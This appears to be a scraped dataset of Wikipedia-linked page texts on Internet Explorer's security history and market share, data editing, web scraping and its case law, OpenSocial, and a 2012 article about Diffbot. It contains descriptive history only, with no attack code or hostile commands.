hole" in Microsoft's software that could allow hackers to remotely plant and run malicious code on Windows PCs. 90 In 2011, a report by Accuvant, funded by Google, rated the security (based on sandboxing) of Internet Explorer worse than Google Chrome but better than Mozilla Firefox. 91 92 A 2017 browser security white paper comparing Google Chrome, Microsoft Edge, and Internet Explorer 11 by X41 D-Sec in 2017 came to similar conclusions, also based on sandboxing and support of legacy web technologies. 93 Internet Explorer has been subjected to many security vulnerabilities and concerns such that the volume of criticism for IE is unusually high. Much of the spyware, adware, and computer viruses across the Internet are made possible by exploitable bugs and flaws in the security architecture of Internet Explorer, sometimes requiring nothing more than viewing of a malicious web page to install themselves. This is known as a "drive-by install. There are also attempts to trick the user into installing malicious software by misrepresenting the software's true purpose in the description section of an ActiveX security alert. A number of security flaws affecting IE originated not in the browser itself, but in ActiveX-based add-ons used by it. Because the add-ons have the same privilege as IE, the flaws can be as critical as browser flaws. This has led to the ActiveX-based architecture being criticized for being fault-prone. By 2005, some experts maintained that the dangers of ActiveX had been overstated and there were safeguards in place. 94 In 2006, new techniques using automated testing found more than a hundred vulnerabilities in standard Microsoft ActiveX components. 95 Security features introduced in Internet Explorer 7 mitigated some of these vulnerabilities. In 2008, Internet Explorer had a number of published security vulnerabilities. According to research done by security research firm Secunia, Microsoft did not respond as quickly as its competitors in fixing security holes and making patches available. 96 The firm also reported 366 vulnerabilities in ActiveX controls, an increase from the previous year. According to an October 2010 report in The Register, researcher Chris Evans had detected a known security vulnerability which, then dating back to 2008, had not been fixed for at least six hundred days. 97 Microsoft says that it had known about this vulnerability, but it was of exceptionally low severity as the victim web site must be configured in a peculiar way for this attack to be feasible at all. 98 In December 2010, researchers were able to bypass the "Protected Mode" feature in Internet Explorer. 99 In an advisory on January 14, 2010, Microsoft said that attackers targeting Google and other U.S. companies used software that exploits a security hole, which had already been patched, in Internet Explorer. The vulnerability affected Internet Explorer 6 from on Windows XP and Server 2003, IE6 SP1 on Windows 2000 SP4, IE7 on Windows Vista, XP, Server 2008, and Server 2003, IE8 on Windows 7, Vista, XP, Server 2003, and Server 2008 (R2). 101 The German government warned users against using Internet Explorer and recommended switching to an alternative web browser, due to the major security hole described above that was exploited in Internet Explorer. 102 The Australian and French Government issued a similar warning a few days later. 103 104 105 106 On April 26, 2014, Microsoft issued a security advisory relating to CVE 2014 1776 (use-after-free vulnerability in Microsoft Internet Explorer 6 through 11 107 ), a vulnerability that could allow "remote code execution" in Internet Explorer versions 6 to 11. 108 On April 28, 2014, the United States Department of Homeland Security's United States Computer Emergency Readiness Team (US-CERT) released an advisory stating that the vulnerability could result in "the complete compromise" of an affected system. 109 US-CERT recommended reviewing Microsoft's suggestions to mitigate an attack or using an alternate browser until the bug is fixed. 110 111 The UK National Computer Emergency Response Team (CERT-UK) published an advisory announcing similar concerns and for users to take the additional step of ensuring their antivirus software is up to date. 112 Symantec, a cyber security firm, confirmed that "the vulnerability crashes Internet Explorer on Windows XP. 113 The vulnerability was resolved on May 1, 2014, with a security update. 114 The adoption rate of Internet Explorer seems to be closely related to that of Microsoft Windows, as it is the default web browser that comes with Windows. Since the integration of Internet Explorer 2.0 with Windows 95 OSR 1 in 1996, and especially after version 4.0's release in 1997, the adoption was greatly accelerated: from below 20% in 1996, to about 40% in 1998, and over 80% in 2000. This made Microsoft the winner in the infamous 'first browser war' against Netscape. Netscape Navigator was the dominant browser during 1995 and until 1997, but rapidly lost share to IE starting in 1998, and eventually slipped behind in 1999. The integration of IE with Windows led to a lawsuit by AOL, Netscape's owner, accusing Microsoft of unfair competition. The infamous case was eventually won by AOL but by then it was too late, as Internet Explorer had already become the dominant browser. Internet Explorer peaked during 2002 and 2003, with about 95% share. Its first notable competitor after beating Netscape was Firefox from Mozilla, which itself was an offshoot from Netscape. Firefox 1.0 had surpassed Internet Explorer 5 in early 2005, with Firefox 1.0 at 8 percent market share. 115 Approximate usage over time based on various usage share counters averaged for the year overall, or for the fourth quarter, or for the last month in the year depending on availability of reference. 116 117 118 119 120 121 According to StatCounter, Internet Explorer's market share fell below 50% in September 2010. 122 In May 2012, Google Chrome overtook Internet Explorer as the most used browser worldwide, according to StatCounter. 123 Browser Helper Objects are also used by many search engines companies and third parties for creating add-ons that access their services, such as search engine toolbars. Because of the use of COM, it is possible to embed web-browsing functionality in third-party applications. Hence, there are several Internet Explorer shells, and several content-centric applications like RealPlayer also use Internet Explorer's web browsing module for viewing web pages within the applications. While a major upgrade of Internet Explorer can be uninstalled in a traditional way if the user has saved the original application files for installation, the matter of uninstalling the version of the browser that has shipped with an operating system remains a controversial one. The idea of removing a stock install of Internet Explorer from a Windows system was proposed during the United States v. Microsoft Corp. case. One of Microsoft's arguments during the trial was that removing Internet Explorer from Windows may result in system instability. Indeed, programs that depend on libraries installed by IE, including Windows help and support system, fail to function without IE. Before Windows Vista, it was not possible to run Windows Update without IE because the service used ActiveX technology, which no other web browser supports. 124 125 The popularity of Internet Explorer led to the appearance of malware abusing its name. On January 28, 2011, a fake Internet Explorer browser calling itself "Internet Explorer Emergency Mode" appeared. It closely resembled the real Internet Explorer but had fewer buttons and no search bar. If a user attempted to launch any other browser such as Google Chrome, Mozilla Firefox, Opera, Safari, or the real Internet Explorer, this browser would be loaded instead. It also displayed a fake error message, claiming that the computer was infected with malware and Internet Explorer had entered "Emergency Mode. It blocked access to legitimate sites such as Google if the user tried to access them. 126 127 |
114 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_editing | Data editing is defined as the process involving the review and adjustment of collected survey data. 1 Data editing helps define guidelines that will reduce potential bias and ensure consistent estimates leading to a clear analysis of the data set by correct inconsistent data using the methods later in this article. 2 The purpose is to control the quality of the collected data. 3 Data editing can be performed manually, with the assistance of a computer or a combination of both. 4 Editing methods refer to a range of procedures and processes used for detecting and handling errors in data. Data editing is used with the goal to improve the quality of statistical data produced. These modifications can greatly improve the quality of analytics created by aiming to detect and correct errors. Examples of different techniques to data editing such as micro-editing, macro-editing, selective editing, or the different tools used to achieve data editings such as graphical editing and interactive editing. The term interactive editing is commonly used for modern computer-assisted manual editing. Most interactive data editing tools applied at National Statistical Institutes (NSIs) allow one to check the specified edits during or after data entry, and if necessary to correct erroneous data immediately. Several approaches can be followed to correct erroneous data: Interactive editing is a standard way to edit data. It can be used to edit both categorical and continuous data. 5 Interactive editing reduces the time frame needed to complete the cyclical process of review and adjustment. 6 Interactive editing also requires an understanding of the data set and the possible results that would come from an analysis of the data. Selective editing is an umbrella term for several methods to identify the influential errors, note 1 and outliers. note 2 Selective editing techniques aim to apply interactive editing to a well-chosen subset of the records, such that the limited time and resources available for interactive editing are allocated to those records where it has the most effect on the quality of the final estimates of published figures. In selective editing, data is split into two streams: The critical stream consists of records that are more likely to contain influential errors. These critical records are edited in a traditional interactive manner. The records in the non-critical stream which are unlikely to contain influential errors are not edited in a computer-assisted manner. 7 Data editing can be accomplished in many ways and primarily depends on the data set that is being explored. 8 The validity of a data set depends on the completeness of the responses provided by the respondents. One method of data editing is to ensure that all responses are complete in fields that require a numerical or non-numerical answer. See the example below. Verifying that the data is unique is an important aspect of data editing to ensure that all data provided was only entered once. This reduces the possibility for repeated data that could skew analytics reporting. See the example below. It is common to find outliers in data sets, which as described before are values that do not fit a model of data well. These extreme values can be found based on the distribution of data points from previous data series or parallel data series for the same data set. The values can be considered erroneous and require further analysis for checking and determining the validity of the response. See the example below. Logical consistency is the presence of logical relationships and interdependence between the variables. This editing requires a certain understanding around the dataset and the ability to identify errors in data based on previous reports or information. This type of data editing is used to account for the differences between data fields or variables. See the example below. There are two methods of macro editing: 7 This method is followed in almost every statistical agency before publication: verifying whether figures to be published seems plausible. This is accomplished by comparing quantities in publication tables with the same quantities in previous publications. If an unusual value is observed, a micro-editing procedure is applied to the individual records and fields contributing to the suspicious quantity. 6 Data available is used to characterize the distribution of the variables. Then all individual values are compared with the distribution. Records containing values that could be considered uncommon (given the distribution) are candidates for further inspection and possibly for editing. 9 In automatic editing records are edited by a computer without human intervention. 10 Prior knowledge on the values of a single variable or a combination of variables can be formulated as a set of edit rules which specify or constrain the admissible values Data editing has its limitations with the capacity and resources of any given study. These determinants can have a positive or negative impact on the post-analysis of the data set. Below are several determinants of data editing. 8 Available resources: 8 Available Software: 8 Data Source: 8 Coordination of Data Editing Procedure: 8 |
115 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-26 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
116 | https://en.wikipedia.org/wiki/Web_scraping | https://ja.wikipedia.org/wiki/%E3%82%A6%E3%82%A7%E3%83%96%E3%82%B9%E3%82%AF%E3%83%AC%E3%82%A4%E3%83%94%E3%83%B3%E3%82%B0 | : Web scraping HTTP WWW ( : Web crawler) HTML WWW 1 API bot index nofollow PJ: P: P: |
117 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/OpenSocial | OpenSocial is a public specification that outlines a set of common application programming interfaces (APIs) for web applications. Initially designed for social network applications, it was developed collaboratively by Google, MySpace and other social networks. It has since evolved into a runtime environment that allows third-party components, regardless of their trust level, to operate within an existing web application. The OpenSocial Foundation has integrated or supported various Open Web technologies, including OAuth and OAuth 2.0, Activity Streams, and Portable Contacts. Since its inception on November 1, 2007, 1 applications that implement the OpenSocial APIs can interoperate with any social network system that supports them. OpenSocial initially adopted a universal approach to development. As the platform matured and the user base expanded, it was modularized, allowing developers to include only necessary components of the platform. 2 Orkut, a Google client, was the first to support OpenSocial. 3 On December 16, 2014, the World Wide Web Consortium (W3C) announced that the OpenSocial Foundation would transition its standards work to the W3C Social Web Activity. 4 This effectively integrated OpenSocial into the W3C’s Social Web Working Group and Social Interest Group, thereby dissolving OpenSocial as a separate entity. In its 0.9 version, OpenSocial incorporated support for a tag-based language. 6 known as OSML. This language facilitates tag-based access to data from the OpenSocial APIs, which previously necessitated an asynchronous client-side request. Additionally, it established a comprehensive tag template system and adopted an expression language that is loosely based on the Java Expression Language. From version 2.0 onwards, OpenSocial began supporting the Activity Streams format. 6 OpenSocial is commonly described as a more open cross-platform alternative to the Facebook Platform, a proprietary service of the popular social network service Facebook. 7 OpenSocial was rumored to be part of a larger social networking initiative by Google code-named "Maka-Maka", 8 9 which is defined as meaning an "intimate friend with whom one is in terms of receiving and giving freely" in Hawaiian. 10 An open-source project, Shindig, was launched in December 2007 to provide a reference implementation of the OpenSocial standards. It has the support of Google, Ning, and other companies developing OpenSocial-related software. The Myspace OpenSocial parser was released as project Negroni in January 2011 and provides a C based implementation of OpenSocial. Apache Rave is a lightweight and open-standards-based extensible platform for using, integrating, and hosting OpenSocial and W3C Widget-related features technologies, and services. It will also provide strong context-aware personalization, collaboration, and content integration capabilities and a high-quality out-of-the-box installation as well as be easy to integrate into other platforms and solutions. 11 Both Shindig and Apache Rave are no longer in development and have been retired by the Apache Foundation. Enterprise websites, such as Friendster, hi5, LinkedIn, MySpace, Orkut, and Salesforce.com are major users of OpenSocial. 12 Friendster has deployed APIs from version 0.7 of the OpenSocial specification, making it easy for existing OpenSocial applications using version 0.7 to be launched on Friendster and reach Friendster over 75 million users. Friendster also plans to support additional OpenSocial APIs in the coming months, including the new 0.8 APIs. 13 hi5 taps Widgetbox support for OpenSocial to get access to the choice of web widgets Widgetbox provides. 14 Myspace Developer Platform (MDP) is based on the OpenSocial API. It supports social networks to develop social and interacting widgets. It can be seen as an answer to Facebook's developer platform. 15 Initial OpenSocial support experienced vulnerabilities in security, with a self-described amateur developer demonstrating exploits of the RockYou gadget on Plaxo, and Ning social networks using the iLike gadget. 16 As reported by TechCrunch on November 5, 2007, OpenSocial was quickly cracked. The total time to crack the OpenSocial-based iLike on Ning was 20 minutes, with the attacker being able to add and remove songs on a user's playlist and access the user's friend information. 17 H sel and Iacono showed that “OpenSocial specifications were far from being comprehensive in respect to security”. 18 They discussed different security implications in the context of OpenSocial. They introduced possible vulnerabilities in Message Integrity and Authentication, Message Confidentiality, and Identity Management and Access Control. Despite the initial fanfare news coverage, OpenSocial encountered many issues initially; it only ran on the Google-owned Orkut, and only with a limited number of devices, with multiple errors reported on other devices. Other networks were still looking into implementing the framework. On December 6, TechCrunch followed up with a report by MediaPops founder Russ Whitman, who said, "While they were initially very excited, they have learned the hard way just how limited the release truly is. Russ added that "core functionality components" are missing and that "write once, distribute broadly" was not accurate. 19 Legend: Discontinued Current Changes to the REST API were made to address several issues that required changes in the OpenSocial specifications so the Open Mobile Alliance could use it.. 20 Common Containers were added that provided "a set of common services that Container developers can leverage for features like in-browser Gadget lifecycle event callbacks, Embedded Experiences, selection handlers, and action handlers. 21 A new Metadata API gives OpenSocial applications the ability to adapt to the capabilities of different OpenSocial containers. The WAP authentication extension was deprecated. OAuth 2.0 support was finalized in this version of OpenSocial. 22 OpenSocial introduced support for Activity Streams. JSON had emerged as the preferred data format and support for ATOM was deprecated. The Gadget format was simplified to give the ability to define a template library within a Gadget specification. 23 While not finalized, the groundwork for OAuth 2.0 support was put in place. In response to enterprise environment needs, OpenSocial added support for advanced mashup scenarios. It enabled gadgets to "securely message each other in a loosely coupled manner. 24 This new feature was called Inter-Gadget Communication. OpenSocial acknowledged that the "one-size-fits-all" approach it was taking was not going to work for the diverse types of websites that had adopted the platform. To address this issue, OpenSocial is modularized into four compliance modules: Core API Server, Core Gadget Server, Social API Server, and Social Gadget Server. 2 This allowed a developer to pick and choose the modules they wanted to use while using other services that aren't part of OpenSocial. Extensions were introduced to allow developers to extend OpenSocial containers. In response to feedback and observation of how developers were using the API, this version focused on making "application development, testing, and deployment easier and faster, while reducing the learning curve for new app developers. 25 The OpenSocial Javascript API was streamlined to make it lightweight while retaining the power of the old Javascript API. Proxied content was introduced to eliminate the need for developers to work around previous AJAX limitations. Proxied content allows content to be fetched from a URL and displayed in a Content tag. In response to a common use of sending data to a remote server immediately after a request, OpenSocial 0.9.0 introduced data pipelining. Data pipelining allows the developer to specify the social data the application will need and make the data immediately available. OpenSocial Templates were introduced to create data-driven UI with a separation of markup and programmatic logic. OpenSocial Markup Language (OSML Markup) is a new set of standardized tags to accomplish common tasks or safely perform normally unsafe operations within templates. OSML is extensible. Developers can create a library of their custom tags. This minor release placed a major focus on server-to-server protocols as "the Person schema has been aligned with the Portable Contacts effort, and an optional RPC proposal has been added. 26 JSON-RPC protocol was added to increase server-to-server functionality. The RESTful protocol that was introduced in v0.8.0 underwent a large revision with several fields being added, modified, and deleted. OpenSocial changed specifications for containers to implement a RESTful API. Many of the OpenSocial Javascript API changes made this version incompatible with previous versions. Existing gadgets continued to use v0.7.0. After updating the gadget, it would use v0.8.0. Security improved with the introduction of OAuth authorization and HTML sanitation, and container lifecycle events. 27 Persistence data was stored in JSON. Released as the "first iteration that can fully support rich, social applications. 28 It added several standard fields for profile information, the ability to send a message to install an application, an Activity template to control activity notifications about what users have been doing, and a simplified persistence API to use feeds instead of global and instance-scoped application data. Another major announcement came from Apache Shindig. Apache Shindig-made gadgets are open-sourced. In coordination with this announcement, OpenSocial 0.7.0 introduced Gadget Specifications for developers to be able to define their gadgets using the Gadget API. Security was a large focus in version 0.6.0. Permission controls were tightened to prevent a gadget from returning information if it is not authorized to do so. New classes were added, such as the Environment class to allow a gadget to respond differently according to its environment and the Surface class to support navigation from one surface to another. The Activities class was simplified based on developer needs and the Stream class was deprecated. 29 Google announced the launch of OpenSocial with a pre-release of version 0.5.0. While unstable, this API introduced "various XML DTDs, Javascript interfaces and other data structures" 30 to the OpenSocial platform. |
118 | https://en.wikipedia.org/wiki/Data_scraping | https://www.technologyreview.com/2012/06/01/85817/a-startup-hopes-to-help-computers-understand-web-pages/ | No matter what language you speak, when you look at a Web page, you can get a good idea of the purpose of the different elements on it—whether they’re images, videos, text, music, or ads. It’s not so easy for machines to do the same, though. That’s where Diffbot hopes to make a difference. The startup, based in Palo Alto, California, offers application programming interfaces that make it possible for machines to “read” the various objects that make up Web pages. This could enable a publisher to repurpose the contents of pages for a mobile app, or help a startup build a price-comparison site. The company’s efforts come at a time when some tech titans are also working to add more structure to the vast amount of data on the Web. Google, for example, recently unveiled the Knowledge Graph, an effort to identify the meaning of search queries and return relevant results, rather than simply matching the text of a query with Web pages that include the same words. But these efforts usually rely on people to help by tagging Web content to infer meaning. John Davi, Diffbot’s vice president of product, says that at its heart, the company is about taking the visual learning technology that propels self-driving cars forward on a road and applying it to Web pages. The idea, which CEO and founder Mike Tung hatched several years ago while he was a graduate student at Stanford, has hummed along since last year. That’s when Diffbot rolled out an API capable of analyzing two types of Web pages on the basis of the URL. On article pages, Diffbot can pick out headlines, the text of articles, pictures, and tags; and on home pages, it can determine basic layout elements like headlines pictures, links to articles, and ads. By now, several thousand programmers are using it to analyze over 100 million URLs each month, Tung says. There are many more types of Web pages out there, though. The company believes there are roughly 18 main types, ranging from product and job pages to photo galleries. With a $2 million round of funding announced Thursday—its first following an earlier round of seed funding—the company plans to get moving on the 16 other types. This will involve determining what makes up pages of these types—photos, prices, and so on—and using that information to build algorithms that can process unfamiliar pages. While Diffbot offers its API to customers for free, it charges for high levels of usage. Brad Garlinghouse, the CEO of file-sharing site YouSendIt and an investor in and advisor to Diffbot, says that while the company isn’t currently profitable, it could be without too much trouble. “They’re solving some here-and-now problems that customers are willing to pay for, says Garlinghouse. Currently, a number of Diffbot users are media companies, including Garlinghouse’s previous employer, AOL (Diffbot powers the content aggregation behind AOL’s tablet magazine, Editions). As Davi, of Diffbot, points out, media companies often purchase publications whose online content has been created with a different content-management system. Diffbot’s API can ease the process of consolidating content, he says. As the company makes it possible to analyze pages of additional types, its founders hope to see Diffbot used for things like product price comparison, photo and recipe aggregation, and more. Tung says, “It’s going to be really exciting to see what people build. Kenyan runners, like many others, are grappling with the impact of expensive, high-performance shoes. The tendency to make things up is holding chatbots back. But that’s just what they do. Pneumatic tubes were supposed to revolutionize the world but have fallen by the wayside. Except in hospitals. AI-powered NPCs that don’t need a script could make games—and other worlds—deeply immersive. Discover special offers, top stories, upcoming events, and more. Thank you for submitting your email It looks like something went wrong. We’re having trouble saving your preferences. Try refreshing this page and updating them one more time. If you continue to get this message, reach out to us at customer-service technologyreview.com with a list of newsletters you’d like to receive. 2024 MIT Technology Review |
119 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Category:Short_description_matches_Wikidata | This category contains articles whose short description matches the description field of the corresponding Wikidata item. No action is needed. This is a tracking category only. The following 200 pages are in this category, out of approximately 2,038,644 total. This list may not reflect recent changes. |
